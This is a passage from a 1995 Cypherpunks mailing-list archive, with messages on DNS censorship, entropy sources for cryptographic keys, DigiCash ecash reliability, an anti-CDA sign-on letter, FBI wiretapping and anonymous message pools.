In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <9511022120.AA15892@all.net>


Sten Drescher opined:
> sameer <sameer at c2.org> said:
> 
> >>  Is it?  This is the _one_ thing in the article (is that term giving
> >> it too much legitimacy?) that I whought was barely true.  Whoever
> >> controls the root level DNS servers effectively controls the
> >> Internet.  I postulated a couple of months ago about how the US Govt
> >> might attempt to censor the rest of the world: "Remove
> >> lurid.porno.site.other-country from your DNS system within 72 hours
> >> or we will remove references to your DNS servers from the root level
> >> servers.".  (I also speculated that if the US Govt tried doing this,
> >> that an 'underground' DNS system would form almost immediately.)
> >> 
> 
> s> 	The US govt. doesn't run the root nameservers, nor are all the
> s> root nameservers within US jurisdiction.
> 
> 	Granted, the US Govt doesn't run the US-based root servers.
> But, if an Internet 'Decency' law was passed, they certainly could try
> to threaten the US-based root server maintainers to make the cascading
> threats.  And, as I understand the way DNS resolution works, address
> requests go down to your root domain then up from the other root domain,
> i.e., for me to find out what c2.org's address is, my system requests
> from:
> NS mpd.tandem.com
> NS tandem.com
> NS com
> NS org
> 
> If this is correct, if the com NS has the entry for the org NS, I won't
> be able to resolve those names.  Of course, explicit IP addresses and
> /etc/hosts entries would still work.

We all know that an alternative DNS structure would rapidly appear, and
perhaps even a second US (black) Internet - with links between the old
and new fully automatic and transparent.  However, perhaps a good
cypherpunks project would be to create and test a contingency plan and
start an alternative DNS system in parallel with the government run ones.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cme at TIS.COM  Thu Nov  2 15:13:18 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 3 Nov 1995 07:13:18 +0800
Subject: Sources of randomness
In-Reply-To: <199511021940.LAA00300@comsec.com>
Message-ID: <9511022143.AA26596@tis.com>


>Date: Thu, 2 Nov 1995 00:39:29 -0800
>From: tcmay at got.net (Timothy C. May)

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

My cable feed into my Mac, for example, has surprisingly little noise --
and it's only local noise (stuff only at my house, not available to the
eavesdropper) which counts as entropy.

>  One of the basic ideas we
>have had, as Cypherpunks, is to encourage widespread methods. Any methods
>that need special hardware tend to not get widely used.
>
>Audio, video, disk timing, and all sorts of other sources of physical
>randomness are useful to have, but most people either won't have the right
>configuration or won't configure their systems so as to use their
>configuration.

Most Macs and PCs have audio inputs.  Most of those are mono,
unfortunately.  [The numeric difference between two stereo mics is
especially hard for an eavesdropper-wannabe to predict/compute, assuming
the room isn't silent.]  However, if the eavesdropper doesn't have a mic in
your room, there's still some entropy available on the mono channel.

Meanwhile, my old Sparcstation 1 had an A-D which, when no mic was
connected, gave about 1 bit/second of entropy.  (The newer Sparc here gives
solid 0's with no mic.)

Recorded audio is useless as entropy, of course.


Almost all computers have a mouse and a normal signature, hand-written with
a mouse, has great gobs of noise.  (I'm still working on the little PC
program to measure this -- but preliminary results show a minimum of 1 bit
of noise per mouse sample -- or 200 bits per signature.  Final results may
get higher entropy rates, but I'll wait for the real results before
claiming that.)


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+







From jya at pipeline.com  Thu Nov  2 15:25:00 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 07:25:00 +0800
Subject: LAF_las
Message-ID: <199511021959.OAA07546@pipe5.nyc.pipeline.com>


   For we CIA-corn peckers:

   Wash Rag today hangs out Page Oner on the billions wasted on
   armaments based on flawed data by the CIA. It has pointers 
on
   how the spooks chew the raw spew and hawk oysters upstairs.

   Two, NYPaper chickenshits editorially on the same, clucks
   affirmation of Deutch and US Congress under-oversight.

   Three, contrarily, NYP's Maureen Dowd ridicules the CIA
   macho history of acceptable wickedness in the public
   interest, and hoots at Deutch's "mensch" complicity, saying
   that laughable agencies don't survive godawfully wicked
   Washington. Cackling right on, Mo.


   LAF_las












From POSTMAST at MVS.MEDCTR.UCLA.EDU  Thu Nov  2 15:46:49 1995
From: POSTMAST at MVS.MEDCTR.UCLA.EDU (BITNET POSTMASTER)
Date: Fri, 3 Nov 1995 07:46:49 +0800
Subject: Reply to ERROR: MAX RETRIES E
Message-ID: <X5306122746>


*** Sent by Alternate User "LM#LK" for "POSTMAST" ***
*** Original Author:  DRESCHS @ TANDEM - ** Remote User **; 11/02/95 12:27

>Message ID: X5306122746 WAS FORWARDED BY POSTMASTER at MGMT
>Original sender: DRESCHS    @TANDEM
>
>Received: from relay3.UU.NET by MVS.MEDCTR.UCLA.EDU (IBM MVS SMTP V2R2.1)
>   with TCP; Thu, 02 Nov 95 12:27:32 PDT
>Received: from toad.com by relay3.UU.NET with SMTP
> id QQzodt13430; Thu, 2 Nov 1995 15:16:35 -0500 (EST)
>Received: by toad.com id AA12091; Thu, 2 Nov 95 11:58:50 PST
>Received: from devnull (devnull.mpd.tandem.com) by toad.com id AA12085; Thu, 2
> Nov 95 11:58:42 PST
>Received: from galil.austnsc.tandem.com. by devnull (8.6.8/8.6.6)
> id NAA03606; Thu, 2 Nov 1995 13:58:28 -0600
>Received: (from dreschs at localhost) by galil.austnsc.tandem.com. (8.7.1/8.7.1) i
> OAA09507; Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>Date: Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>From: Sten Drescher <dreschs at mpd.tandem.com>
>Message-Id: <199511022000.OAA09507 at galil.austnsc.tandem.com.>
>To: sameer <sameer at c2.org>
>Cc: cypherpunks at toad.com
>In-Reply-To: sameer's message of Thu, 2 Nov 1995 10:10:43 -0800 (PST)
>Subject: Re: censored? corrected  Steve Pizzo cited in The Spotlight
>References: <199511021624.KAA05751 at galil.austnsc.tandem.com.>
> <199511021810.KAA14547 at infinity.c2.org>
>Sender: owner-cypherpunks at toad.com
>Precedence: bulk
>
sameer <sameer at c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I whought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>>

s>  The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

 Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and

*** Comments From: POSTMAST - POSTMASTER, BITNET; 11/02/95 12:54
Can someone please tell me how to remove/unsubscribe an email address
from this mail list.  I need the exact commands.  Apparently someone
subscribed to this list using an invalid email address and all the mail
messages are neding up in a bounced mail file.  We need to get this
email address unsubscribed.  Thank you for your help.

Postmaster
mvs.medctr.ucla.edu





From jya at pipeline.com  Thu Nov  2 15:47:06 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 07:47:06 +0800
Subject: ECC_boo
Message-ID: <199511021831.NAA29402@pipe3.nyc.pipeline.com>


   11-2-95. W$Japer:


   "Happy, Healthy and Odd: Nonconformists Live Longer."

      For modern-day eccentrics, computer hackers
      qualified, as did academics, scientists, rock stars and
      artists. Traits: nonconforming; creative; strongly
      motivated by curiosity; idealistic (wanting to make the
      world a better place and the people in it happier);
      cheerfully obsessed with one or more hobbyhorses; aware
      from early childhood of being different; intelligent,
      opinionated, outspoken; convinced of being right and
      that the rest of the world is out of step;
      noncompetitive (not in need of reassurance from the rest
      of society); unusual in eating habits and living
      arrangements; not particularly interested in the
      opinions or the company of other people, except to
      persuade them to his point of view; possessed of a
      mischievous sense of humor; single; usually the eldest
      or an only child; a bad speller.


   ECC_boo  (9 kb)













From dreschs at mpd.tandem.com  Thu Nov  2 15:54:16 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 3 Nov 1995 07:54:16 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511022000.OAA09507@galil.austnsc.tandem.com.>


sameer <sameer at c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I whought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>> 

s> 	The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

	Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and
/etc/hosts entries would still work.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From rah at shipwright.com  Thu Nov  2 16:07:14 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 3 Nov 1995 08:07:14 +0800
Subject: e$: 24 Hours
Message-ID: <v02120d00acbeecc5a243@[199.0.65.105]>


>     Showed up at the speaker's desk at Infoworld Boston, got
                                         ^^^^^^^^^Internet World Boston
Ack. Spam the planet and then typo the first paragraph.

Sorry.

Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From hallam at w3.org  Thu Nov  2 16:33:41 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 08:33:41 +0800
Subject: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022231.AA08841@zorch.w3.org>



>So, refuse to buy their money.
>Demand open systems.

One problem a number of people have reported in DigiCash is disappearing 
money. Several people have reported that if a transfer is misconfigured
the cash can flow out of the wallet, be rejected at the other end and
disappear from the system - i.e. misprinted names on cheques mean lost cash!

This is bad and they report that Digicash did not respond to their
complaints.

	Phill







From jya at pipeline.com  Thu Nov  2 16:46:56 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 08:46:56 +0800
Subject: EMU_boo
Message-ID: <199511021830.NAA29064@pipe3.nyc.pipeline.com>


   11-2-95. FT:


   "Electronic money in a race with Emu."

      Economic and monetary union or electronic money? Recent
      suggestions that the start of Emu might be delayed
      beyond 1999 raise the intriguing possibility that a
      viable international electronic money will be available
      before the European single currency. Depending on your
      perspective, this would be either disaster or nirvana.
      Disaster, because governments and central banks in
      countries with weak currencies would lose the seignorage
      that currency issue brings, and the sovereignty it is
      supposed to provide (but may not). Disaster, because it
      would destroy two central aims of Emu: the sharing of
      power between monetary authorities, and the attempted
      imposition of currency soundness by institutional fiat.
      Nirvana, because it would provide people with a powerful
      protection against the random and hidden taxation
      imposed on them when governments inflate, and because it
      would create monetary soundness via market forces.


   EMU_boo  (5 kb)


   FT on the Web: <www.ft.com> or <www.usa.ft.com>. Selections
   avaliable, not this one, but read today's "Smart building"
   for the security and ID gadgets to track-attack-siphon.













From llurch at networking.stanford.edu  Thu Nov  2 16:49:35 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 08:49:35 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <Pine.ULT.3.91.951102101918.21219C-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995, Sten Drescher wrote:

> Rich Graves <llurch at networking.stanford.edu> said:
> 
> RG> On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote:
> 
> >> But control of Internet domain name registration means the ability to
> >> remove troublesome-or outspoken-computer systems from the
> >> network. Po- tentially, this control also confers the power to
> >> insinuate "phantom" domains into the network-for surveillance
> >> purposes, for example-or for real-time, automatic censorship.
> 
> RG> Anyone capable of sending this message should have known that this
> RG> was complete BS.
> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I whought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)

I stand corrected. SurfWatch already allows people and organizations to do
this voluntarily for anything that mentions sex. I am sure that certain
sites are blocked by China, Vietnam, Singapore, and Fortune 1000
Corporations, for both "moral" and political reasons. 

But it's not the DNS you need to control -- it's the routers. Which are 
still rather distributed. BBN is part of the Eastern Elite, though...

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJkNVY3DXUbM57SdAQG0ywQAiSlU7f1AujiaWQumqQmoIK8dyDoV32+Z
IlBYOxTG9uksIWPdGvQAkqcpPIx6OqOY2iA5FsX/YgjZNKjMjyrSf/cnopAM7GY3
SKDqc1thwMNAVmTFZn7emNafZ5bvwR86V340xdvH+/n396UXF9KeuqcIKk8yvKPI
QCOeBTmJ1RE=
=3Yeq
-----END PGP SIGNATURE-----





From cjl at welchlink.welch.jhu.edu  Thu Nov  2 16:58:16 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Fri, 3 Nov 1995 08:58:16 +0800
Subject: Cypherpunk recruiting opportunity
Message-ID: <Pine.SOL.3.91.951102172127.15248A-100000@welchlink.welch.jhu.edu>



C-punx,

Considering the amount of "preaching to the choir" that goes on here I 
thought that the following news item might supply a more suitable outlet 
for some of the more evangelical-minded Cypherpunks.  After all, it is 
perfectly clear that the science of cryptography exemplifies some of the 
more exciting applications of otherwise-dry mathematics, and there is 
always a need for "voices of reason" in the councils of those who would 
make the 'Net safe for children.

___________________

Tech Help for Schools

While high-tech education visionaries are issuing apocalyptic warnings 
about the fate of the alledgedly backward US school system, a privately 
sponsored group has launched a Peace Corps-style initiative to ease 
schools into the 21st century.

The Massachusetts-based Tech Corps, which recruits volunteers to help 
schools harness computers and telecommunications technology, announced 
last month that it is going national.  The corps, whose chief sponsor is 
the Cellular Telecommunications Industry Association, will hold a 
conference in Washington DC on 30 October where people can learn how to 
start state chapters.  Founded by Gary J. Beach, chief executive officer 
of Computerworld Inc., the corps last year recruited 300 volunteers 
theough the magazine Computerworld who have been working in 12 school 
districts throughout Masachusetts.

Karen Smith, Tech Corps' national director, says the response to the call 
for volunteers from people in industry, government agencies, and private 
consulting firms, has been "incredible."  They help school districts in 
any way they are asked - such as by installing wiring, training teachers, 
persuading local industry to donate hardware, and helping schools 
construct World Wide Web homepages.

Interested parties can reach Tech Corp' own web page at:

http://www.ustc.org



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl at welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )






From ACLUNATL at aol.com  Thu Nov  2 17:23:41 1995
From: ACLUNATL at aol.com (ACLUNATL at aol.com)
Date: Fri, 3 Nov 1995 09:23:41 +0800
Subject: Organizations Needed to Sign Letter Against Online Censorship
Message-ID: <951102140740_10830594@emout04.mail.aol.com>



CYBER-LIBERTIES ALERT!!!        November 2, 1995 
 
from: 
American Civil Liberties Union 
People for the American Way 
 
ORGANIZATIONS NEEDED TO SUPPORT FREE SPEECH IN CYBERSPACE 
 
SIGN THE LETTER BELOW TO OPPOSE FEDERAL ONLINE INDECENCY LEGISLATION! 
 
A conference committee of House and Senate members is now meeting to
determine the future of free speech in cyberspace.  As most of you know,
the House and Senate have now passed two different versions of the
telecommunications bill that would each outlaw "indecent" speech over the
Internet and other online services. 
 
The conference committee now has the power to remove the online indecency 
provisions and to respect the philosophy overwhelmingly approved by the
House in their 420-4 vote in favor of the Cox/Wyden Amendment -- online
users, not government, should determine what online content is appropriate
for themselves and their families. 
 
Groups like the Christian Coalition are contacting the Conference Committee
to urge even stricter criminal provisions for cyberspace than those
contained in the current telecommunications provisions.  Organizations
dedicated to free speech must counter that movement with a groundswell of
opposition to government control over online content. 
 
THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE. 
 
Please sign your organization on to the letter below.  To sign on, send an
e-mail with your organization's name, address, phone number, and e-mail
address to: 
 
Jill Lesser 
People for the American Way 
jlesser at pfaw.org 
 
The deadline for signatures is MONDAY, NOVEMBER 6, 1995, at 5 p.m. 
 
(Due to time constraints, we regret that we are unable to accept further
revisions to the letter.) 
 
------------------------ 
INDIVIDUAL USERS!!! 
 
It is also essential that the Conference Committee hear from individual
online users who are fundamentally opposed to these draconian speech crimes
for cyberspace.  Be sure to watch the Net for an action alert within the
next 24 hours on how to voice your opposition to the Conferees. 
 
------------------------ 
LETTER FROM ORGANIZATIONS OPPOSED TO 
FEDERAL ONLINE INDECENCY LEGISLATION 
 
November ___, 1995 
 
The Honorable Thomas J. Bliley Jr. 
Chairman, Committee on Commerce 
United States House of Representatives 
Washington, DC 20515 
 
The Honorable Larry Pressler 
Chairman, Committee on Commerce, 
Science and Transportation 
United States Senate    
Washington, DC 20510 
 
Re:  Parental Empowerment and Free Expression in Cyberspace 
 
Dear Chairmen Bliley and Pressler: 
 
We write on behalf of a diverse coalition of non-profit civil liberties,
education, library, cultural, arts, labor and other civic organizations,
and commercial producers and distributors of entertainment, information,
journalism, and art, to express our strong belief that the Communications
Decency Act (CDA) (also known as the +Exon Amendment+), sections 401 to 408
of S. 652, is unconstitutional, unworkable and unwise.  We also strongly
beleive that language added to HR 1555, (section 403) amending the federal
criminal code (the Hyde Amendment) is similarly unacceptable, because it
creates new Exon-like speech crimes, including restricting constitutionally
protected speech, mandating vicarious liability for on-line service
providers and endorsing the violatation of privacy rights of individuals. 
 
We urge you to delete from any final telecommunications legislation any
provisions that impose a federal regulatory scheme on online content, hold
online service providers liable for the messages of their customers, censor
online communications in violation of the First Amendment, or encourage the
violation of the privacy of online users.  The CDA and Hyde Amendment
contain an approach and philosophy that almost every member of the House of
Representatives has already expressly rejected in their 420-4 vote in favor
of the Online Family Empowerment provisions offered as an amendment to HR
1555 (section 104) by Representatives Cox (R-CA) and Wyden (D-OR). 
 
The CDA would impose unenforceable and intrusive government regulation on a
newly developing forum for speech and commerce.  While failing to
accomplish its intended goal of protecting children, it would unwisely
impose governmental mandates on content and effectively establish federal
standards for parenting in an online world.  Similarly, the Hyde Amendment
would force  
online service providers to act as censors of constitutionally protected
speech and to invade the privacy of their users. By creating
unconstitutional standards, passage of the CDA or the Hyde Amendment merely
would assure a decade of expensive litigation and the uncertainty that
inevitably accompanies such lawsuits. 
 
As the Conference Committee begins to consider the question of content
control in the online environment, it must not permit unconstitutional
provisions to remain in the bill.  The Conferees challenge is to avoid
interfering with private sector development of effective blocking and
screening technologies that empower online users to make personal decisions
about content, to preserve the fundamental freedoms of the First Amendment,
and to protect each individual's right to keep private communications
private. 
 
The undersigned organizations believe that the following principles must be
adhered to in any provision that affects the emerging online environment: 
 
THE FIRST AMENDMENT RIGHTS OF ALL AMERICANS MUST BE PRESERVED. 
 
Any effort to establish federal control over constitutionally protected
speech must be opposed outright.  There are alternative ways to protect
access by children to certain material without infringing on the free
speech rights of adults.  The Supreme Court has repeatedly ruled that
Congress may not impose a blanket ban on constitutionally protected speech.
 Any general restriction on constitutionally protected content must not
only serve a compelling government interest but also must be implemented by
the least restrictive means available. 
 
POLICIES MUST EMPOWER USERS -- INCLUDING PARENTS -- TO MAKE PERSONAL
DECISIONS ABOUT CONTENT. 
 
While most Americans agree that certain material is unsuitable for
children, there certainly is no consensus about precisely what that
material might be.  The right to decide what children should see and hear
is uniquely personal to the family -- government should have no role in
dictating such personal and private matters.  Instead, policies should
encourage and empower  
individual parents to make decisions about the kinds of content to which
their children should have access. 
 
THERE SHOULD BE NO INCENTIVE FOR GOVERNMENT OR PRIVATE INDUSTRY TO INFRINGE
ON PRIVACY RIGHTS BY READING PRIVATE E-MAIL. 
 
Neither online service providers nor federal regulators should be in the
business of perusing private e-mail for potentially objectionable content. 
The privacy rights in e-mail that Congress recognized in its passage of the
Electronic Communications Privacy Act should not be undercut through  
censorship legislation. 
 
THE ONLINE WORLD MUST OPERATE FREE FROM INTRUSIVE AND UNENFORCEABLE
GOVERNMENT CONTENT REGULATION. 
 
Online service providers and other sectors of the communications industry
already are taking the initiative to develop technologies to permit users
to make choices about the content to which they have access.  
Governmentally imposed standards and mandates are no substitute for the
creativity of the marketplace.  Users are demanding technology that will
preserve the free flow of information, while simultaneously allowing them
to make personal decisions about the content to which they or their
children have access. 
 
CONCLUSION 
 
The undersigned organizations believe that Congress can formulate policies 

consistent with its deregulatory approach and consistent with the  
Constitution.   We stand ready to work with all members of the Conference  
Committee to ensure that the above principles are satisfied. 
 
[The following organizations signed on to a similar letter last summer,
before the House vote on the telecommunications bill.] 
 
Alliance For Community Media 
Alliance for Communications Democracy 
American Arts Alliance 
American Association of Advertising Agencies, Inc. 
American Association of Law Libraries 
American Association of University Professors 
American Civil Liberties Union 
American Communication Association 
American Library Association 
American Society of Journalists and Authors 
Association of American Publishers 
Association of Research Libraries 
Center For Democracy & Technology 
Chicago Computer Society 
Computer Professionals for Social Responsibility 
Council of Literary Magazines and Presses 
Electronic Privacy Information Center 
Feminists for Free Expression 
Freedom to Read Foundation 
Libraries for the Future 
The Literary Network 
Magazine Publishers Association 
Media Access Project 
Media Consortium 
National Assembly of State Arts Agencies 
National Association of Artists Organizations 
National Association of Media Arts & Culture 
National Campaign for Freedom of Expression 
National Coalition Against Censorship 
National Federation of Community Broadcasters 
National Gay & Lesbian Task Force 
National Public Telecomputing Network 
New York City Arts Coalition 
Newspaper Association of America 
Society for Electronic Access 
People For the American Way Action Fund 
Rock Out Censorship 
Theater Communications Group 
Writers Guild of America, East







From hallam at w3.org  Thu Nov  2 17:38:32 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 09:38:32 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <9511022308.AA08199@zorch.w3.org>



>Indeed, I have searched both the constitution and my collected works
>of Nietzsche and found no reference to the inalienable right of
>governments to listen in on any conversations, let alone the 1% of
>conversations the FBI wants access to. 

Nietzsche is not a recognised authority on the US consititution nor
are his works on ethical systems particularly definitive. At best he
points out the deficencies in the ethical systems of Kant and hints
at a limitation of reasoned approaches to ethics. His ethics of
Will are hardly a fully finished system of ethics. If you want a 
contemporary system of ethics you would find Rorty, Habbermass or
Singer a far better choice.

Even within the Nietzschian system of ethics it is very clear that 
listening in on the telephone conversations of "the botched and the
bungled" would lie well within the rights of super-man. Indeed he
is very explicit that there is no logical need for these people to
have rights of any sort. Their lives are at the disposal of the great
leader.

The justification the NSA relies upon is the fact of a Federal law 
that makes it lawful to conduct wiretaps. I think the FBI have gone 
off into gaga land with the magnitude of their request. This is a good
thing. They are not likely to get anything as a result. 


	Phill










From s1113645 at tesla.cc.uottawa.ca  Thu Nov  2 17:47:48 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 3 Nov 1995 09:47:48 +0800
Subject: The ITAR, you don't leave home without it.
Message-ID: <Pine.3.89.9511021819.B29985-0100000@tesla.cc.uottawa.ca>


A funny thought just occurred to me. Micheal Froomkin was recently saying
that the wonderful ITAR applies to American citizens regardless of country
of location. Wouldn't this inane technicality apply to David Chaum in 
Holland? He is American, right? Ever get any problems at US customs David?
The Digicash trial software certainly had crypto in it. I don't remember 
any export controls.





From tony266 at vabeach.email.net  Thu Nov  2 17:48:16 1995
From: tony266 at vabeach.email.net (tony266 at vabeach.email.net)
Date: Fri, 3 Nov 1995 09:48:16 +0800
Subject: What!!!
Message-ID: <9511021825.S84530450@vabeach.email.net>


Can someone tell me this cypherpunks is all about???





From hallam at w3.org  Thu Nov  2 17:51:49 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 09:51:49 +0800
Subject: ecash remailer
In-Reply-To: <9511022349.AA01867@hplyot.obspm.fr>
Message-ID: <9511030011.AA09279@zorch.w3.org>



>No. please get first hand facts. I have 'laundered' more than e$18000, by small 
>amounts of a couple of e$, and *no* bucks were lost(1). I

I did, I got a direct report from a person who is extreemly well known in
the field of computer networks and security. A second person who is well
known in the UNIX and scurity areas reported the same problem.

The fact that you can operate the system correctly does not mean that it
does not have bugs. These people were looking to break the system. 

>but hey... if
>your wallet has an hole, of if you throw away your money, you won't
>whine to the ATM, would you ?

Yes, and I would win. Under regulation E of the Federal Reserve code
my liability is limited to $50. The scenario you describe is analogous
to my cash being stuck in the machine.

This is the essential regulatory problem that e-cash faces. Regardless of the
contract disclaimer it is by no means certain what liability Mark Twain have.
The charges are significantly higher than those for credit cards, I see no
validity in the argument that the small fees mean that a small liability 
should be incurred.


	Phill





From futplex at pseudonym.com  Thu Nov  2 17:54:36 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 09:54:36 +0800
Subject: alt.anonymous.messages considered harmful
In-Reply-To: <199511021625.RAA17800@utopia.hacktic.nl>
Message-ID: <199511022113.QAA23862@opine.cs.umass.edu>


Name Withheld by Request writes:
[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
> Denial of service attacks could be made somewhat less feasible by
> making the pool accessible as a mailing list and via http.

Mailing lists of course suffer the problem of strictly limited participation.
The web approach might work better, in some future with better privacy-
protecting infrastructure in place. Specifically, if HTTP transactions with
a popular web server were routinely encrypted, then all reasonably long
visits to that site would act as cover traffic for a message pool on that
server. As a bonus, you could have a spiffy form on the web page that
searches the pool for you. 

In any event, the server could log your exploration. This returns us to the
issue of strongly anonymous web proxies. (And we could imagine 
countermeasures, like daemons that search for randomly selected pseudonym tags
to muddy the waters. As Tim might say, lots of issues.)

Also, the mention of "as a mailing list _and_ via http" is significant. Making 
the pool available in multiple forms seems to be an unconditional benefit.

-Futplex <futplex at pseudonym.com>





From perry at piermont.com  Thu Nov  2 18:00:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 10:00:07 +0800
Subject: Sources of randomness
In-Reply-To: <9511022143.AA26596@tis.com>
Message-ID: <199511022259.RAA06877@jekyll.piermont.com>



Carl Ellison writes:
> Almost all computers have a mouse and a normal signature, hand-written with
> a mouse, has great gobs of noise.  (I'm still working on the little PC
> program to measure this -- but preliminary results show a minimum of 1 bit
> of noise per mouse sample -- or 200 bits per signature.  Final results may
> get higher entropy rates, but I'll wait for the real results before
> claiming that.)

I have a brochure from a company that sells RS232 interfaced radiation
monitors for only a couple hundred bucks. The things even come with a
RNG demo program.

(The company is "Aware Electronics")

Perry





From dl at hplyot.obspm.fr  Thu Nov  2 18:11:43 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 3 Nov 1995 10:11:43 +0800
Subject: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022349.AA01867@hplyot.obspm.fr>


hallam at w3.org writes:

 > >So, refuse to buy their money.
 > >Demand open systems.
 > One problem a number of people have reported in DigiCash is disappearing 
 > money. Several people have reported that if a transfer is misconfigured
 > the cash can flow out of the wallet, be rejected at the other end and
 > disappear from the system - i.e. misprinted names on cheques mean lost cash!
No. please get first hand facts. I have 'laundered' more than e$
18000, by small amounts of a couple of e$, and *no* bucks were lost(1). I
do have to manually cancel some and to refund ppl from time to time,
and i must admit I'm a bit behind my mail answering about that... but
the money is *not* lost [for everybody]
 > This is bad and they report that Digicash did not respond to their
 > complaints.

They prolly addresses the complaints to the wrong ppl, money does not
disapear as long as you keep the log files to be able to "cancel"
'lost' ebucks

There are/were a couple of small problems with the ecash software, but
no money is lost, as long as you have a consistent file system
[and I think they are working on an "auto recovery/auto cancel"
feature...]

note that there are some problems, initially the proposed shop
software sucked for instance... and writing a better one was a key to
get the system better, maybe it is a bit too early for real bank
also... I think some bugs are still hanging around... but the idea is
great ! [i just wish to have sources/protocol fully disclosed before I
put real money in it...]

ps : I have no interest in digicash whatsoever except being partipant
to the trial and having a small shop {and thus having an fairly large
account ;-)  I wish they give prices to 'good' shops ;-0)}

note1: at least I think no bucks were lost... not a high percentage at
least,... I did had some troubles with the first software version and
managed to *almost* lost stuff, my mismanipulation... but hey... if
